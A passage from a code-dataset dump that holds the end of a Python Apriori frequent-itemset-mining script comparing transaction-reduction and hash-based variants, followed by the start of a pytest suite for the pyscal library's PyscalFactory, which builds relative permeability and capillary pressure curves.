= 0\n if present(D[i],iter1):\n flag = 1\n if flag:\n if iter1 in CK.keys():\n CK[iter1] += 1\n else:\n CK[iter1] = 1\n \n C = OrderedDict(sorted(CK.items()))\n LK = {}\n for key in C.keys():\n if C[key] >= msp:\n LK[key] = C[key]\n return LK\n\ndef frequent_k_itemset(Lk_1, D, msp,k,idx):\n L = apriori_gen(Lk_1,k)\n CK = {}\n for iter1 in L:\n count = 0\n for i in range(idx,len(D)):\n flag = 0\n if present(D[i],iter1): \n flag = 1\n if flag:\n if iter1 in CK.keys():\n CK[iter1] += 1\n else:\n CK[iter1] = 1\n \n C = OrderedDict(sorted(CK.items()))\n LK = {}\n for key in C.keys():\n if C[key] >= msp:\n LK[key] = C[key]\n return LK\n\n\ndef update_transaction_database(D,k,idx):\n i = idx\n while i < len(D):\n if len(D[i]) >= k:\n break\n i+=1\n idx = i\n return idx\n\n\ndef add_to_ans(L):\n lis = []\n for key in L.keys():\n lis.append(key)\n return lis\n\ndef Transaction_Reduction(msp):\n ans = []\n idx = 0\n stage = 1\n L1 = frequent_1(D,msp)\n ans.append(add_to_ans(L1))\n\n stage += 1\n idx = update_transaction_database(D,stage,idx)\n Lk = frequent_2(L1,D,msp,idx)\n \n while len(Lk) > 0:\n ans.append(add_to_ans(Lk))\n stage += 1\n idx = update_transaction_database(D,stage,idx)\n Lk = frequent_k_itemset(Lk,D,msp,stage,idx)\n \n return ans\n\n\ndef hash_function(subset):\n s1 = subset[0]\n s2 = subset[1]\n sum1=0\n sum2=0\n for i in range(0,len(s1)):\n sum1+=ord(s1[i])\n sum1%=mod\n for i in range(0,len(s2)):\n sum2+=ord(s2[i])\n sum2%=mod\n idx = (sum1 + sum2)%mod\n return idx\n\n\ndef freq_1(D,msp):\n C = {}\n for i in range(0,len(D)):\n for key in D[i].keys():\n if key in C.keys():\n C[key] += 1\n else:\n C[key] = 1\n \n C1 = OrderedDict(sorted(C.items()))\n \n L1 = {}\n for key in C1.keys():\n if C1[key] >= msp:\n L1[key] = C1[key]\n\n hash_count = []\n for i in range(0,mod):\n hash_count.append(0)\n \n hash_table = {}\n for key in range(0,mod):\n hash_table[key] = {}\n \n di = {}\n for i in range(0,len(D)):\n lis = []\n if len(D[i]) <= 1:\n \tcontinue\n for key in D[i].keys():\n if key in L1.keys():\n lis.append(key)\n if len(lis) <= 1:\n \tcontinue\n subset = list(itertools.combinations(lis,2))\n for h in range(0,len(subset)):\n idx=0\n if subset[h] in di:\n idx = di[subset[h]]\n else:\n idx = hash_function(subset[h])\n di[subset[h]] = idx\n hash_count[idx] += 1\n if subset[h] in hash_table[idx].keys():\n \thash_table[idx][subset[h]] += 1\n else:\n \thash_table[idx][subset[h]] = 1\n \n \n return L1,hash_table,hash_count\n \n\ndef freq_2(hash_table,hash_count,msp):\n L2 = {}\n for i in range(0,mod):\n if hash_count[i] >= msp:\n for key in hash_table[i].keys():\n if hash_table[i][key] >= msp:\n L2[key] = hash_table[i][key]\n\n return L2\n\n \ndef Hash_Transaction_Reduction(msp):\n ans=[]\n idx2 = 0\n stage = 1\n L1,hash_table,hash_count = freq_1(D,msp)\n ans.append(add_to_ans(L1))\n\n stage += 1\n idx2 = update_transaction_database(D,stage,idx2)\n L2 = freq_2(hash_table,hash_count,msp)\n Lk = OrderedDict(sorted(L2.items()))\n \n while len(Lk) > 0:\n ans.append(add_to_ans(Lk))\n stage += 1\n idx2 = update_transaction_database(D,stage,idx2)\n Lk = frequent_k_itemset(Lk,D,msp,stage,idx2)\n \n return ans\n\n\ndef Hash_Based_Technique(msp):\n ans=[]\n idx2 = 0\n stage = 1\n L1,hash_table,hash_count = freq_1(D,msp)\n ans.append(add_to_ans(L1))\n\n stage += 1\n L2 = freq_2(hash_table,hash_count,msp)\n Lk = OrderedDict(sorted(L2.items()))\n \n while len(Lk) > 0:\n ans.append(add_to_ans(Lk))\n stage += 1\n Lk = frequent_k_itemset(Lk,D,msp,stage,idx2)\n \n return ans\n\n\n\n\nminimum_support = 300\nstart_time = time.time()\nans = Transaction_Reduction(minimum_support)\nend = (time.time()-start_time)\nprint(\"Transaction_Reduction\")\nprint(\"-- Time %s\" % (time.time()-start_time))\nprint(\"\")\nprint(ans)\nprint(\"\")\n\n\nstart_time = time.time()\nans = Hash_Based_Technique(minimum_support)\nend = (time.time()-start_time)\nprint(\"Hash_Based_Technique\")\nprint(\"-- Time %s\" % (time.time()-start_time))\nprint(\"\")\nprint(ans)\nprint(\"\")\n\nstart_time = time.time()\nans = Hash_Transaction_Reduction(minimum_support)\nend = (time.time()-start_time)\nprint(\"Hash_Transaction_Reduction\")\nprint(\"-- Time %s\" % (time.time()-start_time))\nprint(\"\")\nprint(ans)\nprint(\"\")\n\nstart_time = time.time()\nans = apriori(minimum_support)\nend = (time.time()-start_time)\nprint(\"Standard\")\nprint(\"-- Time %s\" % (time.time()-start_time))\nprint(\"\")\nprint(ans)\nprint(\"\")\n","repo_name":"Mehul3217/Frequent-Itemset-Mining-Project","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3980671448","text":"\"\"\"Test the PyscalFactory module\"\"\"\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom pyscal import (\n GasOil,\n GasWater,\n PyscalFactory,\n SCALrecommendation,\n WaterOil,\n WaterOilGas,\n factory,\n)\nfrom pyscal.utils.testing import check_table, sat_table_str_ok\n\n\ndef test_factory_wateroil():\n \"\"\"Test that we can create curves from dictionaries of parameters\"\"\"\n pyscal_factory = PyscalFactory()\n\n # Factory refuses to create incomplete defaulted objects.\n with pytest.raises(ValueError):\n pyscal_factory.create_water_oil()\n\n with pytest.raises(TypeError):\n # (it must be a dictionary)\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_water_oil(swirr=0.01) # noqa\n\n with pytest.raises(TypeError):\n pyscal_factory.create_water_oil(params=\"swirr 0.01\")\n\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swirr=0.01,\n swl=0.1,\n bogus=\"foobar\",\n tag=\"Good sand\",\n nw=3,\n now=2,\n krwend=0.2,\n krwmax=0.5,\n )\n )\n assert isinstance(wateroil, WaterOil)\n assert wateroil.swirr == 0.01\n assert wateroil.swl == 0.1\n assert wateroil.tag == \"Good sand\"\n assert \"KRW\" in wateroil.table\n assert \"Corey\" in wateroil.krwcomment\n assert wateroil.table[\"KRW\"].max() == 0.2 # Because sorw==0 by default\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n wateroil = pyscal_factory.create_water_oil(\n dict(nw=3, now=2, sorw=0.1, krwend=0.2, krwmax=0.5)\n )\n assert isinstance(wateroil, WaterOil)\n assert \"KRW\" in wateroil.table\n assert \"Corey\" in wateroil.krwcomment\n assert wateroil.table[\"KRW\"].max() == 0.5\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Ambiguous works, but we don't guarantee that this results\n # in LET or Corey.\n wateroil = pyscal_factory.create_water_oil(dict(nw=3, Lw=2, Ew=2, Tw=2, now=3))\n assert \"KRW\" in wateroil.table\n assert \"Corey\" in wateroil.krwcomment or \"LET\" in wateroil.krwcomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Mixing Corey and LET\n wateroil = pyscal_factory.create_water_oil(dict(Lw=2, Ew=2, Tw=2, krwend=1, now=4))\n assert isinstance(wateroil, WaterOil)\n assert \"KRW\" in wateroil.table\n assert wateroil.table[\"KRW\"].max() == 1.0\n assert \"LET\" in wateroil.krwcomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n wateroil = pyscal_factory.create_water_oil(\n dict(Lw=2, Ew=2, Tw=2, Low=3, Eow=3, Tow=3, krwend=0.5)\n )\n assert isinstance(wateroil, WaterOil)\n assert \"KRW\" in wateroil.table\n assert \"KROW\" in wateroil.table\n assert wateroil.table[\"KRW\"].max() == 0.5\n assert wateroil.table[\"KROW\"].max() == 1\n assert \"LET\" in wateroil.krwcomment\n assert \"LET\" in wateroil.krowcomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Add capillary pressure\n wateroil = pyscal_factory.create_water_oil(\n dict(swl=0.1, nw=1, now=1, a=2, b=-1, poro_ref=0.2, perm_ref=100, drho=200)\n )\n assert \"PC\" in wateroil.table\n assert wateroil.table[\"PC\"].max() > 0.0\n assert \"Simplified J\" in wateroil.pccomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Test that the optional gravity g is picked up:\n wateroil = pyscal_factory.create_water_oil(\n dict(swl=0.1, nw=1, now=1, a=2, b=-1, poro_ref=0.2, perm_ref=100, drho=200, g=0)\n )\n assert \"PC\" in wateroil.table\n assert wateroil.table[\"PC\"].max() == 0.0\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Test petrophysical simple J:\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swl=0.1,\n nw=1,\n now=1,\n a_petro=2,\n b_petro=-1,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert \"PC\" in wateroil.table\n assert wateroil.table[\"PC\"].max() > 0.0\n assert \"etrophysic\" in wateroil.pccomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # One pc param missing:\n wateroil = pyscal_factory.create_water_oil(\n dict(swl=0.1, nw=1, now=1, a=2, b=-1, perm_ref=100, drho=200, g=0)\n )\n assert \"PC\" not in wateroil.table\n\n\ndef test_fast_mode():\n \"\"\"Test that the fast-flag is passed on to constructed objects\n\n Each object's own test code tests the actual effects of the fast flag\"\"\"\n wateroil = PyscalFactory.create_water_oil({\"nw\": 2, \"now\": 2})\n assert not wateroil.fast\n wateroil = PyscalFactory.create_water_oil({\"nw\": 2, \"now\": 2}, fast=True)\n assert wateroil.fast\n\n gasoil = PyscalFactory.create_gas_oil({\"ng\": 2, \"nog\": 2})\n assert not gasoil.fast\n gasoil = PyscalFactory.create_gas_oil({\"ng\": 2, \"nog\": 2}, fast=True)\n assert gasoil.fast\n\n gaswater = PyscalFactory.create_gas_water({\"nw\": 2, \"ng\": 2})\n assert not gaswater.gasoil.fast\n assert not gaswater.wateroil.fast\n gaswater = PyscalFactory.create_gas_water({\"nw\": 2, \"ng\": 2}, fast=True)\n assert gaswater.gasoil.fast\n assert gaswater.wateroil.fast\n assert gaswater.fast\n\n wateroilgas = PyscalFactory.create_water_oil_gas(\n {\"nw\": 2, \"now\": 2, \"ng\": 2, \"nog\": 2}, fast=True\n )\n assert wateroilgas.fast\n assert wateroilgas.wateroil.fast\n assert wateroilgas.gasoil.fast\n\n scalrec = PyscalFactory.create_scal_recommendation(\n {\n \"low\": {\"nw\": 2, \"now\": 2, \"ng\": 2, \"nog\": 2},\n \"base\": {\"nw\": 2, \"now\": 2, \"ng\": 2, \"nog\": 2},\n \"high\": {\"nw\": 2, \"now\": 2, \"ng\": 2, \"nog\": 2},\n },\n fast=True,\n )\n assert scalrec.low.fast\n assert scalrec.base.fast\n assert scalrec.high.fast\n\n interpolant = scalrec.interpolate(-0.5)\n assert interpolant.fast\n\n\ndef test_init_with_swlheight():\n \"\"\"With sufficient parameters, swl will be calculated on the fly\n when initializing the WaterOil object\"\"\"\n pyscal_factory = PyscalFactory()\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n nw=1,\n now=1,\n swirr=0.01,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert np.isclose(wateroil.swl, 0.02480395)\n assert \"swl=0.024\" in wateroil.SWOF()\n\n with pytest.raises(\n ValueError,\n match=\"Can't initialize from SWLHEIGHT without sufficient simple-J parameters\",\n ):\n # This should fail because capillary pressure parameters are not provided.\n pyscal_factory.create_water_oil(dict(swlheight=200, nw=1, now=1))\n\n # swcr must be larger than swl:\n with pytest.raises(ValueError, match=\"lower than computed swl\"):\n pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n nw=1,\n now=1,\n swirr=0.01,\n swcr=0.0101,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n\n # swlheight must be positive:\n with pytest.raises(ValueError, match=\"swlheight must be larger than zero\"):\n pyscal_factory.create_water_oil(\n dict(\n swlheight=-200,\n nw=1,\n now=1,\n swirr=0.01,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n\n # If swcr is large enough, it will pass:\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n nw=1,\n now=1,\n swirr=0.01,\n swcr=0.3,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert wateroil.swcr > wateroil.swl\n assert wateroil.swcr == 0.3\n assert \"swcr=0.3\" in wateroil.SWOF()\n\n # Test that GasWater also can be initialized with swlheight:\n gaswater = pyscal_factory.create_gas_water(\n dict(\n swlheight=200,\n nw=1,\n ng=1,\n swirr=0.01,\n swcr=0.3,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert \"swl=0.024\" in gaswater.SWFN()\n assert gaswater.swcr > gaswater.swl\n assert gaswater.swcr == 0.3\n assert \"swcr=0.3\" in gaswater.SWFN()\n\n # Test error message for missing swirr when swlheight is asked for:\n with pytest.raises(\n ValueError, match=\"Can't initialize from SWLHEIGHT without sufficient simple-J\"\n ):\n pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n nw=1,\n now=1,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n\n\ndef test_relative_swcr():\n \"\"\"swcr can be initialized relative to swl\n\n Relevant when swl is initialized from swlheight.\"\"\"\n pyscal_factory = PyscalFactory()\n\n with pytest.raises(ValueError, match=\"swl must be provided\"):\n pyscal_factory.create_water_oil(dict(swcr_add=0.1, nw=1, now=1, swirr=0.01))\n with pytest.raises(ValueError, match=\"swcr and swcr_add at the same time\"):\n pyscal_factory.create_water_oil(\n dict(swcr_add=0.1, swcr=0.1, swl=0.1, nw=1, now=1, swirr=0.01)\n )\n wateroil = pyscal_factory.create_water_oil(\n dict(swcr_add=0.1, swl=0.1, nw=1, now=1, swirr=0.01)\n )\n assert wateroil.swcr == 0.2\n\n # Test when relative to swlheight:\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n swcr_add=0.01,\n nw=1,\n now=1,\n swirr=0.01,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert np.isclose(wateroil.swl, 0.02480395)\n assert np.isclose(wateroil.swcr, 0.02480395 + 0.01)\n\n gaswater = pyscal_factory.create_gas_water(\n dict(\n swlheight=200,\n nw=1,\n ng=1,\n swirr=0.01,\n swcr_add=0.1,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert np.isclose(gaswater.swl, 0.02480395)\n assert np.isclose(gaswater.swcr, 0.02480395 + 0.1)\n\n\ndef test_ambiguity():\n \"\"\"Test how the factory handles ambiguity between Corey and LET\n parameters\"\"\"\n pyscal_factory = PyscalFactory()\n wateroil = pyscal_factory.create_water_oil(\n dict(swl=0.1, nw=10, Lw=1, Ew=1, Tw=1, now=2, h=0.1, no=2)\n )\n # Corey is picked here.\n assert \"Corey\" in wateroil.krwcomment\n assert \"KRW\" in wateroil.table\n\n\ndef test_factory_gasoil():\n \"\"\"Test that we can create curves from dictionaries of parameters\"\"\"\n pyscal_factory = PyscalFactory()\n\n # Factory refuses to create incomplete defaulted objects.\n with pytest.raises(ValueError):\n pyscal_factory.create_gas_oil()\n\n with pytest.raises(TypeError):\n # (this must be a dictionary)\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_gas_oil(swirr=0.01) # noqa\n\n with pytest.raises(TypeError):\n pyscal_factory.create_gas_oil(params=\"swirr 0.01\")\n\n gasoil = pyscal_factory.create_gas_oil(\n dict(swirr=0.01, swl=0.1, sgcr=0.05, tag=\"Good sand\", ng=1, nog=2)\n )\n assert isinstance(gasoil, GasOil)\n assert gasoil.sgcr == 0.05\n assert gasoil.sgro == 0.0\n assert gasoil.swl == 0.1\n assert gasoil.swirr == 0.01\n assert gasoil.tag == \"Good sand\"\n sgof = gasoil.SGOF()\n sat_table_str_ok(sgof)\n check_table(gasoil.table)\n assert \"Corey krg\" in sgof\n assert \"Corey krog\" in sgof\n assert \"Zero capillary pressure\" in sgof\n\n gasoil = pyscal_factory.create_gas_oil(\n dict(ng=1.2, nog=2, krgend=0.8, krgmax=0.9, kroend=0.6)\n )\n sgof = gasoil.SGOF()\n sat_table_str_ok(sgof)\n assert \"kroend=0.6\" in sgof\n assert \"krgend=0.8\" in sgof\n check_table(gasoil.table)\n\n gasoil = pyscal_factory.create_gas_oil(dict(ng=1.3, Log=2, Eog=2, Tog=2))\n sgof = gasoil.SGOF()\n check_table(gasoil.table)\n sat_table_str_ok(sgof)\n assert \"Corey krg\" in sgof\n assert \"LET krog\" in sgof\n\n gasoil = pyscal_factory.create_gas_oil(dict(Lg=1, Eg=1, Tg=1, Log=2, Eog=2, Tog=2))\n sgof = gasoil.SGOF()\n sat_table_str_ok(sgof)\n check_table(gasoil.table)\n assert \"LET krg\" in sgof\n assert \"LET krog\" in sgof\n\n\ndef test_factory_wog_gascondensate():\n \"\"\"Test modelling of gas condensate, which in pyscal terms\n is the same as wateroilgas, except that we allow for aliasing\n in sgrw=sorw for the underlying WaterOil object, and also there\n are additional parameters sgro and kromax for GasOil.\"\"\"\n wcg = PyscalFactory.create_water_oil_gas(\n dict(\n nw=2,\n now=3,\n ng=1,\n nog=2,\n sgrw=0.1,\n swl=0.1,\n sgcr=0.1,\n sgro=0.1,\n kroend=0.5,\n kromax=0.9,\n )\n )\n assert wcg.gasoil.sgro == 0.1\n assert wcg.wateroil.sorw == 0.1\n\n swof = wcg.SWOF()\n sgof = wcg.SGOF()\n\n # sgrw has been aliased to sorw, but the WaterOil object does not know that:\n assert \"sgrw\" not in swof\n assert \"sorw=0.1\" in swof\n assert \"sgro=0.1\" in sgof\n assert \"kroend=0.5\" in sgof\n assert \"kromax=0.9\" in sgof\n\n sat_table_str_ok(swof)\n sat_table_str_ok(sgof)\n\n # Different sorw and sgrw is a hard error:\n with pytest.raises(ValueError, match=\"must equal\"):\n PyscalFactory.create_water_oil_gas(\n dict(nw=2, now=3, ng=1, nog=2, sorw=0.2, sgrw=0.1, swl=0.1)\n )\n\n # But it will pass if they both are supplied but are equal:\n wcg_2 = PyscalFactory.create_water_oil_gas(\n dict(nw=2, now=3, ng=1, nog=2, sorw=0.2, sgrw=0.2, swl=0.1)\n )\n assert \"sorw=0.2\" in wcg_2.SWOF()\n\n # kroend higher than kromax is an error:\n with pytest.raises(AssertionError):\n PyscalFactory.create_water_oil_gas(\n dict(\n nw=2,\n now=3,\n ng=1,\n nog=2,\n sgcr=0.1,\n sgro=0.1,\n kromax=0.5,\n kroend=0.8,\n swl=0.1,\n )\n )\n\n\ndef test_factory_go_gascondensate():\n \"\"\"In gas condensate problems, the sgro and kromax parameters are relevant\"\"\"\n pyscal_factory = PyscalFactory()\n gasoil = pyscal_factory.create_gas_oil(\n dict(sgro=0.1, sgcr=0.1, tag=\"Good sand\", ng=1, nog=2, kroend=0.5, kromax=0.9)\n )\n assert isinstance(gasoil, GasOil)\n assert gasoil.sgro == 0.1\n assert gasoil.tag == \"Good sand\"\n sgof = gasoil.SGOF()\n sat_table_str_ok(sgof)\n check_table(gasoil.table)\n assert \"Corey krog\" in sgof\n assert \"kroend=0.5\" in sgof\n assert \"kromax=0.9\" in sgof\n assert \"sgro=0.1\" in sgof\n\n\ndef test_factory_gaswater():\n \"\"\"Test that we can create gas-water curves from dictionaries of parameters\"\"\"\n pyscal_factory = PyscalFactory()\n\n # Factory refuses to create incomplete defaulted objects.\n with pytest.raises(ValueError):\n pyscal_factory.create_gas_water()\n\n with pytest.raises(TypeError):\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_gas_water(swirr=0.01) # noqa\n\n with pytest.raises(TypeError):\n # (it must be a dictionary)\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_gas_water(params=\"swirr 0.01\")\n\n gaswater = pyscal_factory.create_gas_water(\n dict(swirr=0.01, swl=0.03, sgrw=0.1, sgcr=0.15, tag=\"gassy sand\", ng=2, nw=2)\n )\n\n assert isinstance(gaswater, GasWater)\n\n assert gaswater.swirr == 0.01\n assert gaswater.swl == 0.03\n assert gaswater.sgrw == 0.1\n assert gaswater.sgcr == 0.15\n assert gaswater.tag == \"gassy sand\"\n\n sgfn = gaswater.SGFN()\n swfn = gaswater.SWFN()\n sat_table_str_ok(sgfn)\n sat_table_str_ok(swfn)\n check_table(gaswater.wateroil.table)\n check_table(gaswater.gasoil.table)\n\n assert \"sgrw=0.1\" in swfn\n assert \"swirr=0.01\" in sgfn\n assert \"swirr=0.01\" in swfn\n assert \"sgrw=0.1\" in swfn\n assert \"sgcr=0.15\" in sgfn\n assert \"nw=2\" in swfn\n assert \"ng=2\" in sgfn\n assert \"gassy sand\" in sgfn\n\n gaswater = pyscal_factory.create_gas_water(dict(lg=1, eg=1, tg=1, nw=3))\n\n sgfn = gaswater.SGFN()\n swfn = gaswater.SWFN()\n sat_table_str_ok(sgfn)\n sat_table_str_ok(swfn)\n check_table(gaswater.wateroil.table)\n check_table(gaswater.gasoil.table)\n\n\ndef test_factory_wateroilgas():\n \"\"\"Test creating discrete cases of WaterOilGas from factory\"\"\"\n pyscal_factory = PyscalFactory()\n\n # Factory refuses to create incomplete defaulted objects.\n with pytest.raises(ValueError):\n pyscal_factory.create_water_oil_gas()\n\n with pytest.raises(TypeError):\n # (this must be a dictionary)\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_water_oil_gas(swirr=0.01) # noqa\n\n with pytest.raises(TypeError):\n pyscal_factory.create_water_oil_gas(params=\"swirr 0.01\")\n\n wog = pyscal_factory.create_water_oil_gas(dict(nw=2, now=3, ng=1, nog=2.5))\n swof = wog.SWOF()\n sgof = wog.SGOF()\n sat_table_str_ok(swof) # sgof code works for swof also currently\n sat_table_str_ok(sgof)\n assert \"Corey krg\" in sgof\n assert \"Corey krog\" in sgof\n assert \"Corey krw\" in swof\n assert \"Corey krow\" in swof\n check_table(wog.gasoil.table)\n check_table(wog.wateroil.table)\n\n # Some users will mess up lower vs upper case:\n wog = pyscal_factory.create_water_oil_gas(dict(NW=2, NOW=3, NG=1, nog=2.5))\n swof = wog.SWOF()\n sgof = wog.SGOF()\n sat_table_str_ok(swof) # sgof code works for swof also currently\n sat_table_str_ok(sgof)\n assert \"Corey krg\" in sgof\n assert \"Corey krog\" in sgof\n assert \"Corey krw\" in swof\n assert \"Corey krow\" in swof\n\n # Mangling data\n wateroil = pyscal_factory.create_water_oil_gas(dict(nw=2, now=3, ng=1))\n assert wateroil.gasoil is None\n\n\ndef test_factory_wateroilgas_deprecated_krowgend():\n \"\"\"Using long-time deprecated krowend and krogend will fail\"\"\"\n with pytest.raises(ValueError):\n PyscalFactory.create_water_oil_gas(\n dict(nw=2, now=3, ng=1, nog=2.5, krowend=0.6, krogend=0.7)\n )\n\n\ndef test_factory_wateroilgas_wo():\n \"\"\"Test making only wateroil through the wateroilgas factory\"\"\"\n pyscal_factory = PyscalFactory()\n wog = pyscal_factory.create_water_oil_gas(\n dict(nw=2, now=3, kroend=0.5, sorw=0.04, swcr=0.1)\n )\n swof = wog.SWOF()\n assert \"Corey krw\" in swof\n assert \"KRW\" in wog.wateroil.table\n sat_table_str_ok(swof)\n check_table(wog.wateroil.table)\n assert wog.gasoil is None\n\n wog.SGOF()\n\n\ndef test_factory_wateroil_paleooil(caplog):\n \"\"\"Test making a WaterOil object with socr different from sorw.\"\"\"\n pyscal_factory = PyscalFactory()\n sorw = 0.09\n wateroil = pyscal_factory.create_water_oil(\n dict(nw=2, now=3, kroend=0.5, sorw=sorw, socr=sorw + 0.01, swcr=0.1)\n )\n swof = wateroil.SWOF()\n assert \"Corey krw\" in swof\n assert \"socr=0.1\" in swof\n sat_table_str_ok(swof)\n check_table(wateroil.table)\n\n # If socr is close to sorw, socr is reset to sorw.\n for socr in [sorw - 1e-9, sorw, sorw + 1e-9]:\n wo_socrignored = pyscal_factory.create_water_oil(\n dict(nw=2, now=3, kroend=0.5, sorw=0.09, socr=socr, swcr=0.1)\n )\n swof = wo_socrignored.SWOF()\n assert \"socr\" not in swof # socr is effectively ignored when = sorw.\n sat_table_str_ok(swof)\n if socr != sorw:\n # This warning should only occur when it seems like the user\n # has tried to explicitly set socr\n assert \"socr was close to sorw, reset to sorw\" in caplog.text\n\n with pytest.raises(ValueError, match=\"socr must be equal to or larger than sorw\"):\n pyscal_factory.create_water_oil(\n dict(nw=2, now=3, kroend=0.5, sorw=0.09, socr=0.001, swcr=0.1, h=0.1)\n )\n\n\ndef test_load_relperm_df(tmp_path, caplog):\n \"\"\"Test loading of dataframes with validation from excel or from csv\"\"\"\n testdir = Path(__file__).absolute().parent\n\n scalfile_xls = testdir / \"data/scal-pc-input-example.xlsx\"\n\n scaldata = PyscalFactory.load_relperm_df(scalfile_xls)\n with pytest.raises(IOError):\n PyscalFactory.load_relperm_df(\"not-existing-file\")\n\n with pytest.raises(ValueError, match=\"Non-existing sheet-name\"):\n PyscalFactory.load_relperm_df(scalfile_xls, sheet_name=\"foo\")\n\n assert \"SATNUM\" in scaldata\n assert \"CASE\" in scaldata\n assert not scaldata.empty\n\n os.chdir(tmp_path)\n scaldata.to_csv(\"scal-input.csv\")\n scaldata_fromcsv = PyscalFactory.load_relperm_df(\"scal-input.csv\")\n assert \"CASE\" in scaldata_fromcsv\n assert not scaldata_fromcsv.empty\n scaldata_fromdf = PyscalFactory.load_relperm_df(scaldata_fromcsv)\n assert \"CASE\" in scaldata_fromdf\n assert \"SATNUM\" in scaldata_fromdf\n assert len(scaldata_fromdf) == len(scaldata_fromcsv) == len(scaldata)\n\n scaldata_fromcsv = PyscalFactory.load_relperm_df(\"scal-input.csv\", sheet_name=\"foo\")\n assert \"Sheet name only relevant for XLSX files, ignoring foo\" in caplog.text\n\n with pytest.raises(ValueError, match=\"Unsupported argument\"):\n PyscalFactory.load_relperm_df(dict(foo=1))\n\n # Perturb the dataframe, this should trigger errors\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(scaldata.drop(\"SATNUM\", axis=\"columns\"))\n wrongsatnums = scaldata.copy()\n wrongsatnums[\"SATNUM\"] = wrongsatnums[\"SATNUM\"] * 2\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(wrongsatnums)\n wrongsatnums = scaldata.copy()\n wrongsatnums[\"SATNUM\"] = wrongsatnums[\"SATNUM\"].astype(int)\n wrongsatnums = wrongsatnums[wrongsatnums[\"SATNUM\"] > 2]\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(wrongsatnums)\n wrongcases = scaldata.copy()\n wrongcases[\"CASE\"] = wrongcases[\"CASE\"] + \"ffooo\"\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(wrongcases)\n\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(scaldata.drop([\"Lw\", \"Lg\"], axis=\"columns\"))\n\n # Insert a NaN, this replicates what happens if cells are merged\n mergedcase = scaldata.copy()\n mergedcase.loc[3, \"SATNUM\"] = np.nan\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(mergedcase)\n\n relpermfile_xls = testdir / \"data/relperm-input-example.xlsx\"\n relpermdata = PyscalFactory.load_relperm_df(relpermfile_xls)\n assert \"TAG\" in relpermdata\n assert \"SATNUM\" in relpermdata\n assert \"satnum\" not in relpermdata # always converted to upper-case\n assert len(relpermdata) == 3\n swof_str = PyscalFactory.create_pyscal_list(relpermdata, h=0.2).SWOF()\n assert \"Åre 1.8\" in swof_str\n assert \"SATNUM 2\" in swof_str # Autogenerated in SWOF, generated by factory\n assert \"SATNUM 3\" in swof_str\n assert \"foobar\" in swof_str # Random string injected in xlsx.\n\n # Make a dummy text file\n Path(\"dummy.txt\").write_text(\"foo\\nbar, com\", encoding=\"utf8\")\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(\"dummy.txt\")\n\n # Make an empty csv file\n Path(\"empty.csv\").write_text(\"\", encoding=\"utf8\")\n with pytest.raises(ValueError, match=\"Impossible to infer file format\"):\n PyscalFactory.load_relperm_df(\"empty.csv\")\n\n with pytest.raises(ValueError, match=\"SATNUM must be present\"):\n PyscalFactory.load_relperm_df(pd.DataFrame())\n\n # Merge tags and comments if both are supplied\n Path(\"tagandcomment.csv\").write_text(\n \"SATNUM,nw,now,tag,comment\\n1,1,1,a-tag,a-comment\", encoding=\"utf8\"\n )\n tagandcomment_df = PyscalFactory.load_relperm_df(\"tagandcomment.csv\")\n assert (\n tagandcomment_df[\"TAG\"].values[0] == \"SATNUM 1 tag: a-tag; comment: a-comment\"\n )\n\n # Missing SATNUMs:\n Path(\"wrongsatnum.csv\").write_text(\"SATNUM,nw,now\\n1,1,1\\n3,1,1\", encoding=\"utf8\")\n with pytest.raises(ValueError, match=\"Missing SATNUMs?\"):\n 